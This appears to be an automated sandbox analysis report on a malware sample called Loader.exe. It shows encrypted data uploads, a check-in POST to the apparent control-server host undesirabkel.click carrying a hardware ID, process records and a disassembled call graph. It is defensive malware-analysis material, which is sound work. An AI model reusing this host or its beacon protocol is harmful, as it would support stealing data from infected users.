                                                                                                2024-12-27 22:27:15 UTC15331OUTData Raw: 22 0f 61 64 79 9b 65 ed 42 a6 d7 7f 96 53 e4 44 c9 bb ba 9e b3 4a fe bf b6 8a 9f 38 59 04 7c bd 73 38 2f ae ca e3 cd be b6 c0 38 dd be 6f 48 bc 3b f7 ad 2a 6b 58 a2 09 76 e1 54 09 32 52 10 e4 a1 03 ab 4b 33 92 d2 38 41 c8 0d d4 b9 cd 14 a4 ee 66 c3 26 ca 1d 6e 55 3d 14 fd 71 11 10 56 bd 83 c0 2d 9c cc 6c e6 04 07 aa e4 7f 5b f6 ca c6 47 2f 19 70 ed ce f2 90 ac 97 a9 7f fd eb e3 47 c8 1f 3b e3 b3 81 04 f1 de 1b b8 45 1c b2 fc 96 63 9a fb 5c 49 7c 35 5e d1 8a 96 c4 58 ff 99 89 8f 7c b2 19 9a 82 48 be cd c2 6c 8e db 92 86 12 0a b4 91 70 f3 01 2b d2 04 9d 95 3b ab a5 df e6 a3 59 3f a3 44 6f a2 01 6e 73 f5 67 1a cb 67 08 41 bf 36 ba f4 38 e7 5e 20 93 1d e0 5c fd e3 5a 94 43 2f 58 ac 11 02 57 37 46 4b 3e d6 48 8f 56 2a f5 6d 56 c2 d4 c7 00 44 97 d2 df 71 00 8f
                                                                                                Data Ascii: "adyeBSDJ8Y|s8/8oH;*kXvT2RK38Af&nU=qV-l[G/pG;Ec\I|5^X|Hlp+;Y?DonsggA68^ \ZC/XW7FK>HV*mVDq
                                                                                                2024-12-27 22:27:15 UTC15331OUTData Raw: 24 e8 be 43 fd 49 24 84 c8 21 e6 9d a8 07 02 e6 e0 75 c3 f9 6b a1 30 e1 79 88 3e 7f e2 e2 50 85 c3 68 5e 3a 41 44 93 a1 90 ae f8 9a 9c e0 69 0a 9b d6 c3 65 52 5d 54 ee bb 69 9b 8b 61 18 98 40 76 e6 fb d5 fe df f6 b4 16 bd cc 1f 09 9b 80 e7 c0 dc 73 14 2c 3b 7f 66 fc 05 16 e6 c3 f1 2e 4a 63 3b c7 27 e6 5c d9 f6 03 91 06 44 6d 94 99 58 5f d1 0d fb 5a 17 a5 f4 b9 f1 14 b3 0b 8a 97 94 32 0c e6 d4 db 5c 63 ed 6b 88 f2 a1 7a 97 04 e3 c9 fc 80 57 60 3d b6 ea a8 6b 7d a7 59 d3 f8 fe 10 47 a9 00 24 66 95 af a8 97 fe c0 d3 9f 84 bd be 6f d1 1b 4a 46 76 a7 c6 b5 d4 f0 9e 88 06 9a cd a7 c1 6f e5 ab fa 25 9e 9c 17 65 0f 8e 0f 4b f4 3b 6d 3a ff 8b 78 42 29 dc 3f 55 7f 55 80 14 e8 11 c3 18 36 ca ef 29 09 b8 e6 b5 b4 f9 25 11 4f aa 35 95 4b ff 79 9d 76 56 6f a8 99 36 87
                                                                                                Data Ascii: $CI$!uk0y>Ph^:ADieR]Tia@vs,;f.Jc;'\DmX_Z2\ckzW`=k}YG$foJFvo%eK;m:xB)?UU6)%O5KyvVo6
                                                                                                2024-12-27 22:27:15 UTC15331OUTData Raw: c4 fd 3d 80 3e 98 89 d0 92 20 66 be 2c a8 ba bc 1f c0 ff f2 82 68 83 49 f7 ca 9c b5 97 89 2d 64 6d 2c d7 01 f5 5d 93 47 60 bb 99 c3 8c 14 b8 ba db 54 1e 22 c5 c3 41 c8 32 e1 0c 4b f7 d1 64 f8 35 99 17 63 17 24 b1 c4 29 be 8e 5f 09 7e 0b c2 ad 04 44 a4 9b 9f c7 fc 03 15 ee dc 9e 0a f5 4e 87 8e 25 c8 32 1b d7 69 22 f8 5d b2 f0 3b 80 72 1b 4a 8a dd 3a f8 3c 84 88 bf c1 b8 98 6c 3b db 5d 34 ac c7 96 11 16 72 e3 1e bc 36 5a 20 1c a5 d2 09 b8 13 73 e1 47 09 b0 96 e1 af 39 26 e7 95 4e 5b 43 b4 84 a8 10 a4 bc 11 a8 43 15 26 88 d0 09 fb 2e d5 3f 80 f8 21 3e 7e 41 89 6f 35 07 1e c5 ca 3f fd 04 0e f4 7e 6d ca 47 99 35 04 4b 70 de 80 f4 27 c1 aa 08 5a b0 6b 4c e3 8b 27 83 ea 0e f9 ed 01 7c b3 49 79 64 7e be d9 2d 7a 54 98 a0 30 53 7b 59 98 ef 5b f5 67 79 86 36 3f 9d
                                                                                                Data Ascii: => f,hI-dm,]G`T"A2Kd5c$)_~DN%2i"];rJ:<l;]4r6Z sG9&N[CC&.?!>~Ao5?~mG5Kp'ZkL'|Iyd~-zT0S{Y[gy6?
                                                                                                2024-12-27 22:27:15 UTC15331OUTData Raw: 5c 68 fb be 00 ce 51 b3 15 2f c4 06 60 1f 6d 91 ee ff 0f 50 66 9f 6b 3d 2a 34 06 e9 e6 8c 0d bd fd 4f b7 8f c3 c6 77 41 dd 82 6c fe b9 ea fb 87 6f 49 10 b6 1b 05 70 7b 21 32 3f 94 b1 27 7a 28 36 df c8 0e 05 c3 61 b6 bb b7 59 fa 73 d6 ad 9f c1 f5 21 bc dc 29 2c bb 20 fb e8 7e 69 e6 ad 06 35 9b d3 c8 da c6 b8 ef 2f 7d 73 bc 14 c0 1e 3c 27 20 b2 6a 31 46 ea a4 93 2f f7 43 b3 ab 83 2c ad 68 c2 82 9f 2c ce 79 fc d5 fc 36 c0 4f 20 fe 1a 21 06 e1 82 71 5b bf 9e 5d 1a 4d 12 a1 f8 42 e6 8e f9 19 08 99 87 f5 a2 3b 04 9b b2 b4 0e 81 c3 d6 e9 b5 35 46 ab 81 69 4d 68 d3 52 0c 3f bd 91 87 62 6e 52 cc 3d cf b2 d6 93 3e 5d 4f e3 05 93 1b e8 19 3b d0 f4 4b 58 63 81 f2 3a a9 56 36 5d b1 3e 50 56 64 4c e7 8d 72 62 b8 b7 14 b3 59 65 de db 15 f1 4d bf 55 e9 a1 78 ce 83 6b fc
                                                                                                Data Ascii: \hQ/`mPfk=*4OwAloIp{!2?'z(6aYs!), ~i5/}s<' j1F/C,h,y6O !q[]MB;5FiMhR?bnR=>]O;KXc:V6]>PVdLrbYeMUxk
                                                                                                2024-12-27 22:27:18 UTC1135INHTTP/1.1 200 OK
                                                                                                Date: Fri, 27 Dec 2024 22:27:18 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=iui75uubb02s3gcostrgku2g86; expires=Tue, 22 Apr 2025 16:13:56 GMT; Max-Age=9999999; path=/
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                X-Frame-Options: DENY
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                cf-cache-status: DYNAMIC
                                                                                                vary: accept-encoding
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GrBj2foQPQ2YRutdRCdPkmcZDwN6W0Rh8sPDMSOZE1CJSz5JMe%2BoM7w7NX15005Z4IcjV%2FNVvpt4TTm0rMhq2SyR3LWKQfv26N2b13pAEaz%2BOLdFQ9FENdnR9cRoXCrfqJP7xFU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8f8cbca9095c8c78-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1881&min_rtt=1833&rtt_var=721&sent=320&recv=595&lost=0&retrans=0&sent_bytes=2844&recv_bytes=572222&delivery_rate=1593016&cwnd=236&unsent_bytes=0&cid=2f30e11b6b22defd&ts=2805&x=0"


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                7192.168.2.449741104.21.30.134437408C:\Users\user\Desktop\Loader.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-12-27 22:27:20 UTC266OUTPOST /api HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                Content-Length: 89
                                                                                                Host: undesirabkel.click
                                                                                                2024-12-27 22:27:20 UTC89OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 79 78 6f 6a 62 74 75 71 6e 6e 78 66 26 6a 3d 26 68 77 69 64 3d 44 43 41 33 45 45 35 44 45 45 46 32 46 34 31 39 31 34 34 31 45 44 44 38 45 30 35 43 45 33 44 41
                                                                                                Data Ascii: act=get_message&ver=4.0&lid=LPnhqo--yxojbtuqnnxf&j=&hwid=DCA3EE5DEEF2F4191441EDD8E05CE3DA
                                                                                                2024-12-27 22:27:20 UTC1125INHTTP/1.1 200 OK
                                                                                                Date: Fri, 27 Dec 2024 22:27:20 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=7clteh8v0a0udsriluo25snnmi; expires=Tue, 22 Apr 2025 16:13:59 GMT; Max-Age=9999999; path=/
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                X-Frame-Options: DENY
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                cf-cache-status: DYNAMIC
                                                                                                vary: accept-encoding
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iyTS22VelhGKcIC5CV3MJ5pRteEBews6sGsKVZdSxFK%2FDoZrATqQSXkGrlDbfdlVYT6tRDGgnVCGQDy4zqP4HDXy7CwqbYxJ4J6z4w9Kf0DVHvnIfU11u4y%2Bk79S8QPTqyXnw0w%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8f8cbcc3da287d13-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2049&min_rtt=2041&rtt_var=782&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=991&delivery_rate=1384542&cwnd=252&unsent_bytes=0&cid=10e1b688c1d1c70e&ts=776&x=0"
                                                                                                2024-12-27 22:27:20 UTC54INData Raw: 33 30 0d 0a 54 78 33 75 42 79 76 39 38 41 6b 76 4a 51 77 38 55 49 33 68 34 5a 69 32 59 6d 39 4b 56 45 30 4c 38 52 67 31 74 6b 39 78 62 30 41 55 51 41 3d 3d 0d 0a
                                                                                                Data Ascii: 30Tx3uByv98AkvJQw8UI3h4Zi2Ym9KVE0L8Rg1tk9xb0AUQA==
                                                                                                2024-12-27 22:27:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Click to jump to process

                                                                                                Click to jump to process

                                                                                                Click to dive into process behavior distribution

                                                                                                Click to jump to process

                                                                                                Target ID:0
                                                                                                Start time:17:26:54
                                                                                                Start date:27/12/2024
                                                                                                Path:C:\Users\user\Desktop\Loader.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\Loader.exe"
                                                                                                Imagebase:0x920000
                                                                                                File size:567'296 bytes
                                                                                                MD5 hash:7773630ABC9D30D9E4FB74481736224C
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Target ID:1
                                                                                                Start time:17:26:54
                                                                                                Start date:27/12/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:2
                                                                                                Start time:17:26:55
                                                                                                Start date:27/12/2024
                                                                                                Path:C:\Users\user\Desktop\Loader.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Users\user\Desktop\Loader.exe"
                                                                                                Imagebase:0x920000
                                                                                                File size:567'296 bytes
                                                                                                MD5 hash:7773630ABC9D30D9E4FB74481736224C
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Target ID:3
                                                                                                Start time:17:26:55
                                                                                                Start date:27/12/2024
                                                                                                Path:C:\Users\user\Desktop\Loader.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\Loader.exe"
                                                                                                Imagebase:0x920000
                                                                                                File size:567'296 bytes
                                                                                                MD5 hash:7773630ABC9D30D9E4FB74481736224C
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Reset < >

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:6.5%
                                                                                                  Dynamic/Decrypted Code Coverage:1.1%
                                                                                                  Signature Coverage:5.3%
                                                                                                  Total number of Nodes:804
                                                                                                  Total number of Limit Nodes:23
                                                                                                  execution_graph 20086 930402 20087 93040e ___scrt_is_nonwritable_in_current_image 20086->20087 20112 92aa6a 20087->20112 20089 930415 20090 93056e 20089->20090 20098 93043f ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock std::locale::_Setgloballocale 20089->20098 20154 92f9d9 4 API calls 2 library calls 20090->20154 20092 930575 20147 935635 20092->20147 20096 930583 20097 93045e 20098->20097 20102 9304df 20098->20102 20150 93567f 39 API calls 4 library calls 20098->20150 20101 9304e5 20127 922560 20101->20127 20123 937bac 20102->20123 20104 9304fc 20151 92f986 GetModuleHandleW 20104->20151 20106 930506 20106->20092 20107 93050a 20106->20107 20108 930513 20107->20108 20152 935661 21 API calls std::locale::_Setgloballocale 20107->20152 20153 92aaa3 75 API calls ___scrt_uninitialize_crt 20108->20153 20111 93051c 20111->20097 20113 92aa73 20112->20113 20156 92f645 IsProcessorFeaturePresent 20113->20156 20115 92aa7f 20157 930db8 10 API calls 2 library calls 20115->20157 20117 92aa84 20118 92aa88 20117->20118 20158 933320 20117->20158 20118->20089 20121 92aa9f 20121->20089 20124 937bb5 20123->20124 20125 937bba 20123->20125 20171 937cd5 59 API calls 20124->20171 20125->20101 20172 92a803 20127->20172 20131 9225bb 20132 9225c5 20131->20132 20133 922638 20131->20133 20134 922650 20132->20134 20135 9225d0 GetCurrentThreadId 20132->20135 20199 92b47e 30 API calls 2 library calls 20133->20199 20200 92b47e 30 API calls 2 library calls 20134->20200 20137 922661 20135->20137 20138 9225dd 20135->20138 20201 92b47e 30 API calls 2 library calls 20137->20201 20198 92f20d WaitForSingleObjectEx GetExitCodeThread CloseHandle 20138->20198 20142 922672 20202 92b47e 30 API calls 2 library calls 20142->20202 20143 9225ea 20143->20142 20144 9225f5 CryptEncrypt CryptDestroyKey 20143->20144 20144->20104 20357 935780 20147->20357 20150->20102 20151->20106 20152->20108 20153->20111 20154->20092 20155 93564b 21 API calls std::locale::_Setgloballocale 20155->20096 20156->20115 20157->20117 20162 93e3d9 20158->20162 20161 930dd7 7 API calls 2 library calls 20161->20118 20163 93e3e9 20162->20163 20164 92aa91 20162->20164 20163->20164 20166 93db42 20163->20166 20164->20121 20164->20161 20167 93db49 20166->20167 20168 93db8c GetStdHandle 20167->20168 20169 93dbee 20167->20169 20170 93db9f GetFileType 20167->20170 20168->20167 20169->20163 20170->20167 20171->20125 20174 92a808 _Yarn 20172->20174 20173 92259b 20183 935439 20173->20183 20174->20173 20176 92a824 20174->20176 20203 935967 EnterCriticalSection LeaveCriticalSection codecvt 20174->20203 20177 92a82e Concurrency::cancel_current_task 20176->20177 20178 92f428 codecvt 20176->20178 20204 9306fc RaiseException 20177->20204 20205 9306fc RaiseException 20178->20205 20181 92f444 20182 92b5b7 20184 935446 20183->20184 20185 93545a 20183->20185 20215 9377d4 14 API calls __Wcrtomb 20184->20215 20206 9354ca 20185->20206 20188 93544b 20216 937ebf 29 API calls __strnicoll 20188->20216 20191 93546f CreateThread 20193 93549a 20191->20193 20194 93548e GetLastError 20191->20194 20244 935560 20191->20244 20192 935456 20192->20131 20218 93551a 20193->20218 20217 9377fa 14 API calls 2 library calls 20194->20217 20198->20143 20203->20174 20204->20182 20205->20181 20226 93d3a4 20206->20226 20211 9354ef GetModuleHandleExW 20212 93550c 20211->20212 20213 93551a 16 API calls 20212->20213 20214 935466 20213->20214 20214->20191 20214->20193 20215->20188 20216->20192 20217->20193 20219 935526 20218->20219 20220 9354a5 20218->20220 20221 935535 20219->20221 20222 93552c CloseHandle 20219->20222 20220->20131 20223 935544 20221->20223 20224 93553b FreeLibrary 20221->20224 20222->20221 20225 93bfc7 ___free_lconv_mon 14 API calls 20223->20225 20224->20223 20225->20220 20227 93d3b1 20226->20227 20228 93d3f1 20227->20228 20229 93d3dc HeapAlloc 20227->20229 20233 93d3c5 __Wcrtomb 20227->20233 20242 9377d4 14 API calls __Wcrtomb 20228->20242 20230 93d3ef 20229->20230 20229->20233 20232 9354db 20230->20232 20235 93bfc7 20232->20235 20233->20228 20233->20229 20241 935967 EnterCriticalSection LeaveCriticalSection codecvt 20233->20241 20236 93bfd2 RtlFreeHeap 20235->20236 20237 9354e8 20235->20237 20236->20237 20238 93bfe7 GetLastError 20236->20238 20237->20211 20237->20212 20239 93bff4 __dosmaperr 20238->20239 20243 9377d4 14 API calls __Wcrtomb 20239->20243 20241->20233 20242->20232 20243->20237 20245 93556c ___scrt_is_nonwritable_in_current_image 20244->20245 20246 935573 GetLastError ExitThread 20245->20246 20247 935580 20245->20247 20258 93c25a GetLastError 20247->20258 20252 93559c 20289 9354bc 20252->20289 20259 93c270 20258->20259 20260 93c276 20258->20260 20293 93cc84 6 API calls std::_Lockit::_Lockit 20259->20293 20264 93c27a SetLastError 20260->20264 20294 93ccc3 6 API calls std::_Lockit::_Lockit 20260->20294 20263 93c292 20263->20264 20266 93d3a4 __Wcrtomb 14 API calls 20263->20266 20268 935585 20264->20268 20269 93c30f 20264->20269 20267 93c2a7 20266->20267 20270 93c2c0 20267->20270 20271 93c2af 20267->20271 20285 93f857 20268->20285 20299 938443 39 API calls std::locale::_Setgloballocale 20269->20299 20296 93ccc3 6 API calls std::_Lockit::_Lockit 20270->20296 20295 93ccc3 6 API calls std::_Lockit::_Lockit 20271->20295 20276 93c2bd 20281 93bfc7 ___free_lconv_mon 14 API calls 20276->20281 20277 93c2cc 20278 93c2d0 20277->20278 20279 93c2e7 20277->20279 20297 93ccc3 6 API calls std::_Lockit::_Lockit 20278->20297 20298 93c56c 14 API calls __Wcrtomb 20279->20298 20281->20264 20283 93c2f2 20284 93bfc7 ___free_lconv_mon 14 API calls 20283->20284 20284->20264 20286 93f867 std::locale::_Setgloballocale 20285->20286 20287 935590 20285->20287 20286->20287 20300 93cf79 20286->20300 20287->20252 20292 93ced0 5 API calls std::_Lockit::_Lockit 20287->20292 20318 9355de 20289->20318 20291 9354c9 20292->20252 20293->20260 20294->20263 20295->20276 20296->20277 20297->20276 20298->20283 20303 93d0c6 20300->20303 20304 93cf95 20303->20304 20305 93d0f6 20303->20305 20304->20287 20305->20304 20310 93cffb 20305->20310 20308 93d110 GetProcAddress 20308->20304 20309 93d120 std::_Lockit::_Lockit 20308->20309 20309->20304 20316 93d00c ___vcrt_FlsSetValue 20310->20316 20311 93d0a2 20311->20304 20311->20308 20312 93d02a LoadLibraryExW 20313 93d045 GetLastError 20312->20313 20314 93d0a9 20312->20314 20313->20316 20314->20311 20315 93d0bb FreeLibrary 20314->20315 20315->20311 20316->20311 20316->20312 20317 93d078 LoadLibraryExW 20316->20317 20317->20314 20317->20316 20327 93c3ab GetLastError 20318->20327 20320 93562b ExitThread 20321 935602 20324 935615 20321->20324 20325 93560e CloseHandle 20321->20325 20322 9355e9 20322->20320 20322->20321 20350 93cf0b 5 API calls std::_Lockit::_Lockit 20322->20350 20324->20320 20326 935621 FreeLibraryAndExitThread 20324->20326 20325->20324 20326->20320 20328 93c3c1 20327->20328 20331 93c3c7 20327->20331 20351 93cc84 6 API calls std::_Lockit::_Lockit 20328->20351 20348 93c3cb SetLastError 20331->20348 20352 93ccc3 6 API calls std::_Lockit::_Lockit 20331->20352 20332 93c3e3 20334 93d3a4 __Wcrtomb 12 API calls 20332->20334 20332->20348 20335 93c3f8 20334->20335 20336 93c411 20335->20336 20337 93c400 20335->20337 20354 93ccc3 6 API calls std::_Lockit::_Lockit 20336->20354 20353 93ccc3 6 API calls std::_Lockit::_Lockit 20337->20353 20340 93c40e 20346 93bfc7 ___free_lconv_mon 12 API calls 20340->20346 20341 93c41d 20342 93c421 20341->20342 20343 93c438 20341->20343 20355 93ccc3 6 API calls std::_Lockit::_Lockit 20342->20355 20356 93c56c 14 API calls __Wcrtomb 20343->20356 20346->20348 20347 93c443 20349 93bfc7 ___free_lconv_mon 12 API calls 20347->20349 20348->20322 20349->20348 20350->20321 20351->20331 20352->20332 20353->20340 20354->20341 20355->20340 20356->20347 20358 9357bf 20357->20358 20359 9357ad 20357->20359 20369 93591a 20358->20369 20384 92f986 GetModuleHandleW 20359->20384 20363 93057b 20363->20155 20364 9357b2 20364->20358 20385 9356b4 GetModuleHandleExW 20364->20385 20367 935811 20370 935926 ___scrt_is_nonwritable_in_current_image 20369->20370 20391 9381d1 EnterCriticalSection 20370->20391 20372 935930 20392 935817 20372->20392 20374 93593d 20396 93595b 20374->20396 20377 93574f 20401 935736 20377->20401 20379 935759 20380 93576d 20379->20380 20381 93575d GetCurrentProcess TerminateProcess 20379->20381 20382 9356b4 std::locale::_Setgloballocale 3 API calls 20380->20382 20381->20380 20383 935775 ExitProcess 20382->20383 20384->20364 20386 9356f3 GetProcAddress 20385->20386 20387 935714 20385->20387 20386->20387 20388 935707 20386->20388 20389 935723 20387->20389 20390 93571a FreeLibrary 20387->20390 20388->20387 20389->20358 20390->20389 20391->20372 20393 935823 ___scrt_is_nonwritable_in_current_image std::locale::_Setgloballocale 20392->20393 20395 935887 std::locale::_Setgloballocale 20393->20395 20399 9374ee 14 API calls 3 library calls 20393->20399 20395->20374 20400 9381e8 LeaveCriticalSection 20396->20400 20398 9357f6 20398->20363 20398->20377 20399->20395 20400->20398 20404 93f830 5 API calls std::locale::_Setgloballocale 20401->20404 20403 93573b std::locale::_Setgloballocale 20403->20379 20404->20403 20405 929a90 20406 929a99 20405->20406 20407 929aaf 20405->20407 20412 922320 GetModuleHandleA GetModuleFileNameW 20406->20412 20419 92b66d RaiseException Concurrency::cancel_current_task 20407->20419 20420 93a98a 20412->20420 20414 922360 20424 922060 GetPEB 20414->20424 20418 92237a 20421 93a99d _Fputc 20420->20421 20454 93a9ff 20421->20454 20423 93a9af _Fputc 20423->20414 20485 921240 20424->20485 20428 9220f1 GetFileSize 20429 922105 20428->20429 20430 9222ac CloseHandle 20428->20430 20431 92210d ReadFile 20429->20431 20436 9222d5 20430->20436 20432 922129 CloseHandle 20431->20432 20433 9222a3 20431->20433 20434 9222b5 20432->20434 20446 922140 _Yarn _Ref_count_obj _strlen 20432->20446 20433->20430 20497 921fa0 20434->20497 20447 92a881 20436->20447 20437 9222eb 20516 9227e0 30 API calls std::_Throw_Cpp_error 20437->20516 20439 9222f7 20517 937ecf 29 API calls 2 library calls 20439->20517 20440 92a803 RaiseException EnterCriticalSection LeaveCriticalSection codecvt 20440->20446 20446->20434 20446->20437 20446->20439 20446->20440 20510 921000 20446->20510 20448 92a88a IsProcessorFeaturePresent 20447->20448 20449 92a889 20447->20449 20451 92f537 20448->20451 20449->20418 20870 92f61d SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 20451->20870 20453 92f61a 20453->20418 20455 93aa2f 20454->20455 20456 93aa3e 20455->20456 20457 93aa5c 20455->20457 20475 93aa33 20455->20475 20478 938068 29 API calls 2 library calls 20456->20478 20459 93aa69 20457->20459 20479 933880 39 API calls _Fputc 20457->20479 20462 93aa83 20459->20462 20463 93aaa1 20459->20463 20461 92a881 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 20464 93aca4 20461->20464 20480 9467eb 5 API calls 3 library calls 20462->20480 20466 93ac31 20463->20466 20467 93aab5 20463->20467 20464->20423 20466->20475 20484 93c111 WideCharToMultiByte _Fputc 20466->20484 20468 93ab4f 20467->20468 20473 93aaf9 20467->20473 20467->20475 20482 93c111 WideCharToMultiByte _Fputc 20468->20482 20472 93ab62 20474 93ab7b GetLastError 20472->20474 20472->20475 20481 93c111 WideCharToMultiByte _Fputc 20473->20481 20474->20475 20477 93ab8a 20474->20477 20475->20461 20477->20475 20483 93c111 WideCharToMultiByte _Fputc 20477->20483 20478->20475 20479->20459 20480->20475 20481->20475 20482->20472 20483->20477 20484->20475 20486 921402 CreateFileA 20485->20486 20496 921283 _Yarn _Ref_count_obj _strlen 20485->20496 20486->20428 20486->20436 20487 921422 20518 9227e0 30 API calls std::_Throw_Cpp_error 20487->20518 20489 92142e 20519 937ecf 29 API calls 2 library calls 20489->20519 20491 92a803 RaiseException EnterCriticalSection LeaveCriticalSection codecvt 20491->20496 20494 921000 102 API calls 20494->20496 20496->20486 20496->20487 20496->20489 20496->20491 20496->20494 20498 921240 102 API calls 20497->20498 20499 921fc8 FreeConsole 20498->20499 20520 921560 20499->20520 20501 921fe9 20502 921560 103 API calls 20501->20502 20503 921ffa 20502->20503 20504 921240 102 API calls 20503->20504 20505 92200d VirtualProtect 20504->20505 20507 92202e 20505->20507 20508 92a881 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 20507->20508 20509 922053 20508->20509 20509->20436 20511 921013 20510->20511 20726 9228f0 20511->20726 20524 9215a0 20520->20524 20525 9217b2 _Ref_count_obj 20524->20525 20526 92178d 20524->20526 20530 9244c0 20524->20530 20543 921800 20524->20543 20557 921dc0 20524->20557 20525->20501 20526->20525 20565 937ecf 29 API calls 2 library calls 20526->20565 20531 924504 20530->20531 20532 9245ee 20530->20532 20534 924545 20531->20534 20535 92451e 20531->20535 20541 924533 _Yarn 20531->20541 20566 9227f0 30 API calls 2 library calls 20532->20566 20536 92a803 codecvt 3 API calls 20534->20536 20535->20532 20538 92452a 20535->20538 20536->20541 20540 92a803 codecvt 3 API calls 20538->20540 20540->20541 20542 9245c4 _Ref_count_obj 20541->20542 20567 937ecf 29 API calls 2 library calls 20541->20567 20542->20524 20544 921838 _strlen 20543->20544 20547 9218e3 20544->20547 20554 9218bd 20544->20554 20594 922df0 20544->20594 20547->20554 20568 924600 20547->20568 20548 921c3e 20549 921c4f 20548->20549 20604 923a80 39 API calls 2 library calls 20548->20604 20549->20524 20554->20548 20605 9230a0 38 API calls std::ios_base::_Init 20554->20605 20606 923460 30 API calls 5 library calls 20554->20606 20607 9306fc RaiseException 20554->20607 20555 92193d 20555->20554 20585 92dfe0 20555->20585 20558 921e0c 20557->20558 20559 924600 67 API calls 20558->20559 20560 921e20 20559->20560 20712 924cb0 20560->20712 20563 922df0 39 API calls 20564 921e9b 20563->20564 20564->20524 20566->20541 20608 92ab94 20568->20608 20571 924678 20584 9246f6 20571->20584 20621 924790 67 API calls 2 library calls 20571->20621 20572 92ab94 std::_Lockit::_Lockit 7 API calls 20573 924657 20572->20573 20614 92abc5 20573->20614 20574 92abc5 std::_Lockit::~_Lockit 2 API calls 20575 924725 20574->20575 20575->20555 20578 9246db 20579 9246e3 20578->20579 20580 924738 20578->20580 20622 92ace3 RaiseException _Yarn Concurrency::cancel_current_task 20579->20622 20623 923ff0 RaiseException Concurrency::cancel_current_task 20580->20623 20584->20574 20588 92e00e 20585->20588 20593 92e007 20585->20593 20586 92a881 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 20587 92e10c 20586->20587 20587->20555 20590 92e0c0 20588->20590 20591 92e059 20588->20591 20588->20593 20590->20593 20631 93941d 20590->20631 20591->20593 20628 92dbca 20591->20628 20593->20586 20595 922efa 20594->20595 20596 922e30 20594->20596 20595->20547 20597 922e53 20596->20597 20598 922df0 39 API calls 20596->20598 20602 922e77 20596->20602 20597->20595 20708 923a80 39 API calls 2 library calls 20597->20708 20598->20602 20602->20597 20709 9230a0 38 API calls std::ios_base::_Init 20602->20709 20710 923460 30 API calls 5 library calls 20602->20710 20711 9306fc RaiseException 20602->20711 20604->20549 20605->20554 20606->20554 20607->20554 20609 92aba3 20608->20609 20610 92abaa 20608->20610 20624 9381ff 6 API calls std::_Lockit::_Lockit 20609->20624 20612 92463a 20610->20612 20625 92fbb8 EnterCriticalSection 20610->20625 20612->20571 20612->20572 20615 92abcf 20614->20615 20616 93820d 20614->20616 20620 92abe2 20615->20620 20626 92fbc6 LeaveCriticalSection 20615->20626 20627 9381e8 LeaveCriticalSection 20616->20627 20619 938214 20619->20571 20620->20571 20621->20578 20622->20584 20624->20612 20625->20612 20626->20620 20627->20619 20635 938e81 